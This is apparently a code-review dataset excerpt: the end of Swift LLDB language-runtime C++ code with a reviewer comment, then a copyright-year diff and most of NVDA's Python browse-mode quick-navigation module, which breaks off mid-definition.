return UINT32_MAX; } bool Update() override { return false; } bool MightHaveChildren() override { return true; } ConstString GetSyntheticTypeName() override { return m_projection->type_name; } private: size_t m_num_bases; TypeProjectionUP::element_type *m_projection; }; public: SyntheticChildrenFrontEnd::AutoPointer GetFrontEnd(ValueObject &backend) { return SyntheticChildrenFrontEnd::AutoPointer( new ProjectionFrontEndProvider(backend, m_projection)); } }; lldb::SyntheticChildrenSP SwiftLanguageRuntime::GetBridgedSyntheticChildProvider(ValueObject &valobj) { ConstString type_name = valobj.GetCompilerType().GetTypeName(); if (!type_name.IsEmpty()) { auto iter = m_bridged_synthetics_map.find(type_name.AsCString()), end = m_bridged_synthetics_map.end(); if (iter != end) return iter->second; } ProjectionSyntheticChildren::TypeProjectionUP type_projection( new ProjectionSyntheticChildren::TypeProjectionUP::element_type()); if (auto swift_ast_ctx = valobj.GetScratchSwiftASTContext()) { Status error; CompilerType swift_type = swift_ast_ctx->GetTypeFromMangledTypename(type_name, error); if (swift_type.IsValid()) { ExecutionContext exe_ctx(GetProcess()); bool any_projected = false; for (size_t idx = 0, e = swift_type.GetNumChildren(true, &exe_ctx); idx < e; idx++) { // if a projection fails, keep going - we have offsets here, so it // should be OK to skip some members if (auto projection = ProjectionSyntheticChildren::FieldProjection( swift_type, &exe_ctx, idx)) { any_projected = true; type_projection->field_projections.push_back(projection); } } if (any_projected) { type_projection->type_name = swift_type.GetDisplayTypeName(); SyntheticChildrenSP synth_sp = SyntheticChildrenSP(new ProjectionSyntheticChildren( SyntheticChildren::Flags(), std::move(type_projection))); m_bridged_synthetics_map.insert({type_name.AsCString(), synth_sp}); return synth_sp; } } } return nullptr; } void SwiftLanguageRuntime::WillStartExecutingUserExpression( bool runs_in_playground_or_repl) { 
std::lock_guard<std::mutex> lock(m_active_user_expr_mutex); Log *log(GetLogIfAnyCategoriesSet(LIBLLDB_LOG_EXPRESSIONS)); if (m_active_user_expr_count == 0 && m_dynamic_exclusivity_flag_addr && !runs_in_playground_or_repl) { // We're executing the first user expression. Toggle the flag. Status error; TypeSystem *type_system = m_process->GetTarget().GetScratchTypeSystemForLanguage( &error, eLanguageTypeC_plus_plus); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to get pointer to type " "system: %s", error.AsCString()); return; } ConstString BoolName("bool"); llvm::Optional<uint64_t> bool_size = type_system->GetBuiltinTypeByName(BoolName).GetByteSize(nullptr); if (!bool_size) return; Scalar original_value; m_process->ReadScalarIntegerFromMemory(*m_dynamic_exclusivity_flag_addr, *bool_size, false, original_value, error); m_original_dynamic_exclusivity_flag_state = original_value.UInt() != 0; if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to read " "disableExclusivityChecking flag state: %s", error.AsCString()); } else { Scalar new_value(1U); m_process->WriteScalarToMemory(*m_dynamic_exclusivity_flag_addr, new_value, *bool_size, error); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to set " "disableExclusivityChecking flag state: %s", error.AsCString()); } else { if (log) log->Printf("SwiftLanguageRuntime: Changed " "disableExclusivityChecking flag state from %u to 1", m_original_dynamic_exclusivity_flag_state); } } } ++m_active_user_expr_count; if (log) log->Printf("SwiftLanguageRuntime: starting user expression. " "Number active: %u", m_active_user_expr_count); } void SwiftLanguageRuntime::DidFinishExecutingUserExpression( bool runs_in_playground_or_repl) { std::lock_guard<std::mutex> lock(m_active_user_expr_mutex); Log *log(GetLogIfAnyCategoriesSet(LIBLLDB_LOG_EXPRESSIONS)); --m_active_user_expr_count; if (log) log->Printf("SwiftLanguageRuntime: finished user expression. 
" "Number active: %u", m_active_user_expr_count); if (m_active_user_expr_count == 0 && m_dynamic_exclusivity_flag_addr && !runs_in_playground_or_repl) { Status error; TypeSystem *type_system = m_process->GetTarget().GetScratchTypeSystemForLanguage( &error, eLanguageTypeC_plus_plus); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to get pointer to type " "system: %s", error.AsCString()); return; } ConstString BoolName("bool"); llvm::Optional<uint64_t> bool_size = type_system->GetBuiltinTypeByName(BoolName).GetByteSize(nullptr); if (!bool_size) return; Scalar original_value(m_original_dynamic_exclusivity_flag_state ? 1U : 0U); m_process->WriteScalarToMemory(*m_dynamic_exclusivity_flag_addr, original_value, *bool_size, error); if (error.Fail()) { if (log) log->Printf("SwiftLanguageRuntime: Unable to reset " "disableExclusivityChecking flag state: %s", error.AsCString()); } else { if (log) log->Printf("SwiftLanguageRuntime: Changed " "disableExclusivityChecking flag state back to %u", m_original_dynamic_exclusivity_flag_state); } } } llvm::Optional<Value> SwiftLanguageRuntime::GetErrorReturnLocationAfterReturn( lldb::StackFrameSP frame_sp) { llvm::Optional<Value> error_val; llvm::StringRef error_reg_name; ArchSpec arch_spec(GetTargetRef().GetArchitecture()); switch (arch_spec.GetMachine()) { case llvm::Triple::ArchType::arm: error_reg_name = "r6"; break; case llvm::Triple::ArchType::aarch64: error_reg_name = "x21"; break; case llvm::Triple::ArchType::x86_64: error_reg_name = "r12"; break; default: break; } if (error_reg_name.empty()) return error_val; RegisterContextSP reg_ctx = frame_sp->GetRegisterContext(); const RegisterInfo *reg_info = reg_ctx->GetRegisterInfoByName(error_reg_name); lldbassert(reg_info && "didn't get the right register name for swift error register"); if (!reg_info) return error_val; RegisterValue reg_value; if (!reg_ctx->ReadRegister(reg_info, reg_value)) { // Do some logging here. 
return error_val; } lldb::addr_t error_addr = reg_value.GetAsUInt64(); if (error_addr == 0) return error_val; Value val; if (reg_value.GetScalarValue(val.GetScalar())) { val.SetValueType(Value::eValueTypeScalar); val.SetContext(Value::eContextTypeRegisterInfo, const_cast<RegisterInfo *>(reg_info)); error_val = val; } return error_val; } llvm::Optional<Value> SwiftLanguageRuntime::GetErrorReturnLocationBeforeReturn( lldb::StackFrameSP frame_sp, bool &need_to_check_after_return) { llvm::Optional<Value> error_val; if (!frame_sp) { need_to_check_after_return = false; return error_val; } // For Architectures where the error isn't returned in a register, // there's a magic variable that points to the value. Check that first: ConstString error_location_name("$error"); VariableListSP variables_sp = frame_sp->GetInScopeVariableList(false); VariableSP error_loc_var_sp = variables_sp->FindVariable( error_location_name, eValueTypeVariableArgument); if (error_loc_var_sp) { need_to_check_after_return = false; ValueObjectSP error_loc_val_sp = frame_sp->GetValueObjectForFrameVariable( error_loc_var_sp, eNoDynamicValues); if (error_loc_val_sp && error_loc_val_sp->GetError().Success()) error_val = error_loc_val_sp->GetValue(); return error_val; } // Otherwise, see if we know which register it lives in from the calling convention. // This should probably go in the ABI plugin not here, but the Swift ABI can change with // swiftlang versions and that would make it awkward in the ABI. 
Function *func = frame_sp->GetSymbolContext(eSymbolContextFunction).function; if (!func) { need_to_check_after_return = false; return error_val; } need_to_check_after_return = func->CanThrow(); return error_val; } //------------------------------------------------------------------ // Static Functions //------------------------------------------------------------------ LanguageRuntime * SwiftLanguageRuntime::CreateInstance(Process *process, lldb::LanguageType language) { if (language == eLanguageTypeSwift) return new SwiftLanguageRuntime(process); else return NULL; } lldb::BreakpointResolverSP SwiftLanguageRuntime::CreateExceptionResolver(Breakpoint *bkpt, bool catch_bp, bool throw_bp) { BreakpointResolverSP resolver_sp; if (throw_bp) resolver_sp.reset(new BreakpointResolverName( bkpt, "swift_willThrow", eFunctionNameTypeBase, eLanguageTypeUnknown, Breakpoint::Exact, 0, eLazyBoolNo)); // FIXME: We don't do catch breakpoints for ObjC yet. // Should there be some way for the runtime to specify what it can do in this // regard? 
return resolver_sp; } static const char * SwiftDemangleNodeKindToCString(const swift::Demangle::Node::Kind node_kind) { #define NODE(e) \ case swift::Demangle::Node::Kind::e: \ return #e; switch (node_kind) { #include "swift/Demangling/DemangleNodes.def" } return "swift::Demangle::Node::Kind::???"; #undef NODE } static OptionDefinition g_swift_demangle_options[] = { // clang-format off {LLDB_OPT_SET_1, false, "expand", 'e', OptionParser::eNoArgument, nullptr, {}, 0, eArgTypeNone, "Whether LLDB should print the demangled tree"}, // clang-format on }; class CommandObjectSwift_Demangle : public CommandObjectParsed { public: CommandObjectSwift_Demangle(CommandInterpreter &interpreter) : CommandObjectParsed(interpreter, "demangle", "Demangle a Swift mangled name", "language swift demangle"), m_options() {} ~CommandObjectSwift_Demangle() {} virtual Options *GetOptions() { return &m_options; } class CommandOptions : public Options { public: CommandOptions() : Options(), m_expand(false, false) { OptionParsingStarting(nullptr); } virtual ~CommandOptions() {} Status SetOptionValue(uint32_t option_idx, llvm::StringRef option_arg, ExecutionContext *execution_context) override { Status error; const int short_option = m_getopt_table[option_idx].val; switch (short_option) { case 'e': m_expand.SetCurrentValue(true); break; default: error.SetErrorStringWithFormat("invalid short option character '%c'", short_option); break; } return error; } void OptionParsingStarting(ExecutionContext *execution_context) override { m_expand.Clear(); } llvm::ArrayRef<OptionDefinition> GetDefinitions() override { return llvm::makeArrayRef(g_swift_demangle_options); } // Options table: Required for subclasses of Options. 
OptionValueBoolean m_expand; }; protected: void PrintNode(swift::Demangle::NodePointer node_ptr, Stream &stream, int depth = 0) { if (!node_ptr) return; std::string indent(2 * depth, ' '); stream.Printf("%s", indent.c_str()); stream.Printf("kind=%s", SwiftDemangleNodeKindToCString(node_ptr->getKind())); if (node_ptr->hasText()) { std::string Text = node_ptr->getText(); stream.Printf(", text=\"%s\"", Text.c_str()); } if (node_ptr->hasIndex()) stream.Printf(", index=%" PRIu64, node_ptr->getIndex()); stream.Printf("\n"); for (auto &&child : *node_ptr) { PrintNode(child, stream, depth + 1); } } bool DoExecute(Args &command, CommandReturnObject &result) { for (size_t i = 0; i < command.GetArgumentCount(); i++) { const char *arg = command.GetArgumentAtIndex(i); if (arg && *arg) { swift::Demangle::Context demangle_ctx; auto node_ptr = demangle_ctx.demangleSymbolAsNode(llvm::StringRef(arg)); if (node_ptr) { if (m_options.m_expand) { PrintNode(node_ptr, result.GetOutputStream()); } result.GetOutputStream().Printf( "%s ---> %s\n", arg, swift::Demangle::nodeToString(node_ptr).c_str()); } } } result.SetStatus(lldb::eReturnStatusSuccessFinishResult); return true; } CommandOptions m_options; }; class CommandObjectSwift_RefCount : public CommandObjectRaw { public: CommandObjectSwift_RefCount(CommandInterpreter &interpreter) : CommandObjectRaw(interpreter, "refcount", "Inspect the reference count data for a Swift object", "language swift refcount", eCommandProcessMustBePaused | eCommandRequiresFrame) {} ~CommandObjectSwift_RefCount() {} virtual Options *GetOptions() { return nullptr; } private: enum class ReferenceCountType { eReferenceStrong, eReferenceUnowned, eReferenceWeak, }; llvm::Optional<uint32_t> getReferenceCount(StringRef ObjName, ReferenceCountType Type, ExecutionContext &exe_ctx, StackFrameSP &Frame) { std::string Kind; switch (Type) { case ReferenceCountType::eReferenceStrong: Kind = ""; break; case ReferenceCountType::eReferenceUnowned: Kind = "Unowned"; break; case 
ReferenceCountType::eReferenceWeak: Kind = "Weak"; break; } EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); ValueObjectSP result_valobj_sp; std::string Expr = (llvm::Twine("Swift._get") + Kind + llvm::Twine("RetainCount(") + ObjName + llvm::Twine(")")) .str(); bool evalStatus = exe_ctx.GetTargetSP()->EvaluateExpression( Expr, Frame.get(), result_valobj_sp, eval_options); if (evalStatus != eExpressionCompleted) return llvm::None; bool success = false; uint32_t count = result_valobj_sp->GetSyntheticValue()->GetValueAsUnsigned( UINT32_MAX, &success); if (!success) return llvm::None; return count; } protected: bool DoExecute(llvm::StringRef command, CommandReturnObject &result) { StackFrameSP frame_sp(m_exe_ctx.GetFrameSP()); EvaluateExpressionOptions options; options.SetLanguage(lldb::eLanguageTypeSwift); options.SetResultIsInternal(true); ValueObjectSP result_valobj_sp; // We want to evaluate first the object we're trying to get the // refcount of, in order, to, e.g. see whether it's available. // So, given `language swift refcount patatino`, we try to // evaluate `expr patatino` and fail early in case there is // an error. bool evalStatus = m_exe_ctx.GetTargetSP()->EvaluateExpression( command, frame_sp.get(), result_valobj_sp, options); if (evalStatus != eExpressionCompleted) { result.SetStatus(lldb::eReturnStatusFailed); if (result_valobj_sp && result_valobj_sp->GetError().Fail()) result.AppendError(result_valobj_sp->GetError().AsCString()); return false; } // At this point, we're sure we're grabbing in our hands a valid // object and we can ask questions about it. `refcounts` are only // defined on class objects, so we throw an error in case we're // trying to look at something else. 
result_valobj_sp = result_valobj_sp->GetQualifiedRepresentationIfAvailable( lldb::eDynamicCanRunTarget, true); CompilerType result_type(result_valobj_sp->GetCompilerType()); if (!(result_type.GetTypeInfo() & lldb::eTypeInstanceIsPointer)) { result.AppendError("refcount only available for class types"); result.SetStatus(lldb::eReturnStatusFailed); return false; } // Ask swift debugger support in the compiler about the objects // reference counts, and return them to the user. llvm::Optional<uint32_t> strong = getReferenceCount( command, ReferenceCountType::eReferenceStrong, m_exe_ctx, frame_sp); llvm::Optional<uint32_t> unowned = getReferenceCount( command, ReferenceCountType::eReferenceUnowned, m_exe_ctx, frame_sp); llvm::Optional<uint32_t> weak = getReferenceCount( command, ReferenceCountType::eReferenceWeak, m_exe_ctx, frame_sp); std::string unavailable = "<unavailable>"; result.AppendMessageWithFormat( "refcount data: (strong = %s, unowned = %s, weak = %s)\n", strong ? std::to_string(*strong).c_str() : unavailable.c_str(), unowned ? std::to_string(*unowned).c_str() : unavailable.c_str(), weak ? 
std::to_string(*weak).c_str() : unavailable.c_str()); result.SetStatus(lldb::eReturnStatusSuccessFinishResult); return true; } }; class CommandObjectMultiwordSwift : public CommandObjectMultiword { public: CommandObjectMultiwordSwift(CommandInterpreter &interpreter) : CommandObjectMultiword( interpreter, "swift", "A set of commands for operating on the Swift Language Runtime.", "swift <subcommand> [<subcommand-options>]") { LoadSubCommand("demangle", CommandObjectSP(new CommandObjectSwift_Demangle( interpreter))); LoadSubCommand("refcount", CommandObjectSP(new CommandObjectSwift_RefCount( interpreter))); } virtual ~CommandObjectMultiwordSwift() {} }; void SwiftLanguageRuntime::Initialize() { PluginManager::RegisterPlugin( GetPluginNameStatic(), "Language runtime for the Swift language", CreateInstance, [](CommandInterpreter &interpreter) -> lldb::CommandObjectSP { return CommandObjectSP(new CommandObjectMultiwordSwift(interpreter)); }, GetBreakpointExceptionPrecondition); } void SwiftLanguageRuntime::Terminate() { PluginManager::UnregisterPlugin(CreateInstance); } lldb_private::ConstString SwiftLanguageRuntime::GetPluginNameStatic() { static ConstString g_name("swift"); return g_name; } //------------------------------------------------------------------ // PluginInterface protocol //------------------------------------------------------------------ lldb_private::ConstString SwiftLanguageRuntime::GetPluginName() { return GetPluginNameStatic(); } uint32_t SwiftLanguageRuntime::GetPluginVersion() { return 1; }
1
19,909
Do you want to make this an assertion instead?
apple-swift-lldb
cpp
@@ -1,5 +1,5 @@ #A part of NonVisual Desktop Access (NVDA) -#Copyright (C) 2015 NV Access Limited +#Copyright (C) 2016 NV Access Limited #This file is covered by the GNU General Public License. #See the file COPYING for more details.
1
#A part of NonVisual Desktop Access (NVDA) #Copyright (C) 2015 NV Access Limited #This file is covered by the GNU General Public License. #See the file COPYING for more details. import itertools import collections import winsound import time import weakref import wx import queueHandler from logHandler import log import review import scriptHandler import eventHandler import nvwave import queueHandler import gui import ui import cursorManager from scriptHandler import isScriptWaiting, willSayAllResume import aria import controlTypes import config import textInfos import braille import speech import sayAllHandler import treeInterceptorHandler import inputCore import api from NVDAObjects import NVDAObject REASON_QUICKNAV = "quickNav" def reportPassThrough(treeInterceptor,onlyIfChanged=True): """Reports the pass through mode if it has changed. @param treeInterceptor: The current Browse Mode treeInterceptor. @type treeInterceptor: L{BrowseModeTreeInterceptor} @param onlyIfChanged: if true reporting will not happen if the last reportPassThrough reported the same thing. @type onlyIfChanged: bool """ if not onlyIfChanged or treeInterceptor.passThrough != reportPassThrough.last: if config.conf["virtualBuffers"]["passThroughAudioIndication"]: sound = r"waves\focusMode.wav" if treeInterceptor.passThrough else r"waves\browseMode.wav" nvwave.playWaveFile(sound) else: if treeInterceptor.passThrough: ui.message(_("focus mode")) else: ui.message(_("browse mode")) reportPassThrough.last = treeInterceptor.passThrough reportPassThrough.last = False def mergeQuickNavItemIterators(iterators,direction="next"): """ Merges multiple iterators that emit L{QuickNavItem} objects, yielding them from first to last. They are sorted using min or max (__lt__ should be implemented on the L{QuickNavItem} objects). @param iters: the iterators you want to merge. @type iters: sequence of iterators that emit L{QuicknavItem} objects. @param direction: the direction these iterators are searching (e.g. 
next, previuos) @type direction: string """ finder=min if direction=="next" else max curValues=[] # Populate a list with all iterators and their corisponding first value for it in iterators: try: val=next(it) except StopIteration: continue curValues.append((it,val)) # Until all iterators have been used up, # Find the first (minimum or maximum) of all the values, # emit that, and update the list with the next available value for the iterator who's value was emitted. while len(curValues)>0: first=finder(curValues,key=lambda x: x[1]) curValues.remove(first) it,val=first yield val try: newVal=next(it) except StopIteration: continue curValues.append((it,newVal)) class QuickNavItem(object): """ Emitted by L{BrowseModeTreeInterceptor._iterNodesByType}, this represents one of many positions in a browse mode document, based on the type of item being searched for (e.g. link, heading, table etc).""" itemType=None #: The type of items searched for (e.g. link, heading, table etc) label=None #: The label that should represent this item in the Elements list. isAfterSelection=False #: Is this item positioned after the caret in the document? Used by the elements list to plae its own selection. def __init__(self,itemType,document): """ @param itemType: the type that was searched for (e.g. link, heading, table etc) @ type itemType: string @ param document: the browse mode document this item is a part of. @type document: L{BrowseModeTreeInterceptor} """ self.itemType=itemType self.document=document def isChild(self,parent): """ Is this item a child of the given parent? This is used when representing items in a hierarchical tree structure, such as the Elements List. @param parent: the item of whom this item may be a child of. @type parent: L{QuickNavItem} @return: True if this item is a child, false otherwise. @rtype: bool """ raise NotImplementedError def report(self,readUnit=None): """ Reports the contents of this item. @param readUnit: the optional unit (e.g. 
line, paragraph) that should be used to announce the item position when moved to. If not given, then the full sise of the item is used. @type readUnit: a L{textInfos}.UNIT_* constant. """ raise NotImplementedError def moveTo(self): """ Moves the browse mode caret or focus to this item. """ raise NotImplementedError def activate(self): """ Activates this item's position. E.g. follows a link, presses a button etc. """ raise NotImplementedError def rename(self,newName): """ Renames this item with the new name. """ raise NotImplementedError @property def isRenameAllowed(self): return False class TextInfoQuickNavItem(QuickNavItem): """ Represents a quick nav item in a browse mode document who's positions are represented by a L{textInfos.TextInfo}. """ def __init__(self,itemType,document,textInfo): """ See L{QuickNavItem.__init__} for itemType and document argument definitions. @param textInfo: the textInfo position this item represents. @type textInfo: L{textInfos.TextInfo} """ self.textInfo=textInfo super(TextInfoQuickNavItem,self).__init__(itemType,document) def __lt__(self,other): return self.textInfo.compareEndPoints(other.textInfo,"startToStart")<0 @property def obj(self): return self.textInfo.basePosition if isinstance(self.textInfo.basePosition,NVDAObject) else None @property def label(self): return self.textInfo.text.strip() def isChild(self,parent): if parent.textInfo.isOverlapping(self.textInfo): return True return False def report(self,readUnit=None): info=self.textInfo if readUnit: fieldInfo = info.copy() info.collapse() info.move(readUnit, 1, endPoint="end") if info.compareEndPoints(fieldInfo, "endToEnd") > 0: # We've expanded past the end of the field, so limit to the end of the field. 
info.setEndPoint(fieldInfo, "endToEnd") speech.speakTextInfo(info, reason=controlTypes.REASON_FOCUS) def activate(self): self.textInfo.obj._activatePosition(self.textInfo) def moveTo(self): info=self.textInfo.copy() info.collapse() self.document._set_selection(info,reason=REASON_QUICKNAV) @property def isAfterSelection(self): caret=self.document.makeTextInfo(textInfos.POSITION_CARET) return self.textInfo.compareEndPoints(caret, "startToStart") > 0 class BrowseModeTreeInterceptor(treeInterceptorHandler.TreeInterceptor): scriptCategory = inputCore.SCRCAT_BROWSEMODE def _get_shouldTrapNonCommandGestures(self): return config.conf['virtualBuffers']['trapNonCommandGestures'] def script_trapNonCommandGesture(self,gesture): winsound.PlaySound("default",1) singleLetterNavEnabled=True #: Whether single letter navigation scripts should be active (true) or if these letters should fall to the application. def getAlternativeScript(self,gesture,script): if self.passThrough or not gesture.isCharacter: return script if not self.singleLetterNavEnabled: return None if not script and self.shouldTrapNonCommandGestures: script=self.script_trapNonCommandGesture return script def script_toggleSingleLetterNav(self,gesture): if self.singleLetterNavEnabled: self.singleLetterNavEnabled=False # Translators: Reported when single letter navigation in browse mode is turned off. ui.message(_("Single letter navigation off")) else: self.singleLetterNavEnabled=True # Translators: Reported when single letter navigation in browse mode is turned on. ui.message(_("Single letter navigation on")) # Translators: the description for the toggleSingleLetterNavigation command in browse mode. script_toggleSingleLetterNav.__doc__=_("Toggles single letter navigation on and off. When on, single letter keys in browse mode jump to various kinds of elements on the page. 
When off, these keys are passed to the application") def _get_ElementsListDialog(self): return ElementsListDialog def _iterNodesByType(self,itemType,direction="next",pos=None): """ Yields L{QuickNavItem} objects representing the ordered positions in this document according to the type being searched for (e.g. link, heading, table etc). @param itemType: the type being searched for (e.g. link, heading, table etc) @type itemType: string @param direction: the direction in which to search (next, previous, up) @ type direction: string @param pos: the position in the document from where to seart the search. @type pos: Usually an L{textInfos.TextInfo} @raise NotImplementedError: This type is not supported by this BrowseMode implementation """ raise NotImplementedError def _iterNotLinkBlock(self, direction="next", pos=None): raise NotImplementedError def _quickNavScript(self,gesture, itemType, direction, errorMessage, readUnit): if itemType=="notLinkBlock": iterFactory=self._iterNotLinkBlock else: iterFactory=lambda direction,info: self._iterNodesByType(itemType,direction,info) info=self.selection try: item = next(iterFactory(direction, info)) except NotImplementedError: # Translators: a message when a particular quick nav command is not supported in the current document. 
ui.message(_("Not supported in this document")) return except StopIteration: ui.message(errorMessage) return item.moveTo() if not gesture or not willSayAllResume(gesture): item.report(readUnit=readUnit) @classmethod def addQuickNav(cls, itemType, key, nextDoc, nextError, prevDoc, prevError, readUnit=None): scriptSuffix = itemType[0].upper() + itemType[1:] scriptName = "next%s" % scriptSuffix funcName = "script_%s" % scriptName script = lambda self,gesture: self._quickNavScript(gesture, itemType, "next", nextError, readUnit) script.__doc__ = nextDoc script.__name__ = funcName script.resumeSayAllMode=sayAllHandler.CURSOR_CARET setattr(cls, funcName, script) cls.__gestures["kb:%s" % key] = scriptName scriptName = "previous%s" % scriptSuffix funcName = "script_%s" % scriptName script = lambda self,gesture: self._quickNavScript(gesture, itemType, "previous", prevError, readUnit) script.__doc__ = prevDoc script.__name__ = funcName script.resumeSayAllMode=sayAllHandler.CURSOR_CARET setattr(cls, funcName, script) cls.__gestures["kb:shift+%s" % key] = scriptName def script_elementsList(self,gesture): # We need this to be a modal dialog, but it mustn't block this script. def run(): gui.mainFrame.prePopup() d = self.ElementsListDialog(self) d.ShowModal() d.Destroy() gui.mainFrame.postPopup() wx.CallAfter(run) # Translators: the description for the Elements List command in browse mode. script_elementsList.__doc__ = _("Lists various types of elements in this document") def _activatePosition(self): raise NotImplementedError def script_activatePosition(self,gesture): self._activatePosition() # Translators: the description for the activatePosition script on browseMode documents. script_activatePosition.__doc__ = _("activates the current object in the document") __gestures={ "kb:NVDA+f7": "elementsList", "kb:enter": "activatePosition", "kb:space": "activatePosition", "kb:NVDA+shift+space":"toggleSingleLetterNav", } # Add quick navigation scripts. 
qn = BrowseModeTreeInterceptor.addQuickNav qn("heading", key="h", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading")) qn("heading1", key="1", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 1"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 1"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 1"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 1")) qn("heading2", key="2", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 2"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 2"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 2"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 2")) qn("heading3", key="3", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 3"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 3"), # Translators: Input help message for a quick navigation command in browse mode. 
prevDoc=_("moves to the previous heading at level 3"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 3")) qn("heading4", key="4", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 4"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 4"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 4"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 4")) qn("heading5", key="5", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 5"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 5"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 5"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 5")) qn("heading6", key="6", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next heading at level 6"), # Translators: Message presented when the browse mode element is not found. nextError=_("no next heading at level 6"), # Translators: Input help message for a quick navigation command in browse mode. prevDoc=_("moves to the previous heading at level 6"), # Translators: Message presented when the browse mode element is not found. prevError=_("no previous heading at level 6")) qn("table", key="t", # Translators: Input help message for a quick navigation command in browse mode. nextDoc=_("moves to the next table"), # Translators: Message presented when the browse mode element is not found. 
	nextError=_("no next table"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous table"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous table"),
	readUnit=textInfos.UNIT_LINE)
qn("link", key="k",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next link"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next link"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous link"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous link"))
qn("visitedLink", key="v",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next visited link"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next visited link"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous visited link"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous visited link"))
qn("unvisitedLink", key="u",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next unvisited link"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next unvisited link"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous unvisited link"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous unvisited link"))
qn("formField", key="f",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next form field"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next form field"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous form field"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous form field"),
	readUnit=textInfos.UNIT_LINE)
qn("list", key="l",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next list"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next list"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous list"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous list"),
	readUnit=textInfos.UNIT_LINE)
qn("listItem", key="i",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next list item"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next list item"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous list item"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous list item"))
qn("button", key="b",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next button"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next button"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous button"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous button"))
qn("edit", key="e",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next edit field"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next edit field"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous edit field"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous edit field"),
	readUnit=textInfos.UNIT_LINE)
qn("frame", key="m",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next frame"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next frame"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous frame"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous frame"),
	readUnit=textInfos.UNIT_LINE)
qn("separator", key="s",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next separator"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next separator"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous separator"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous separator"))
qn("radioButton", key="r",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next radio button"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next radio button"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous radio button"),
	# Translators: Message presented when the browse mode element is not found.
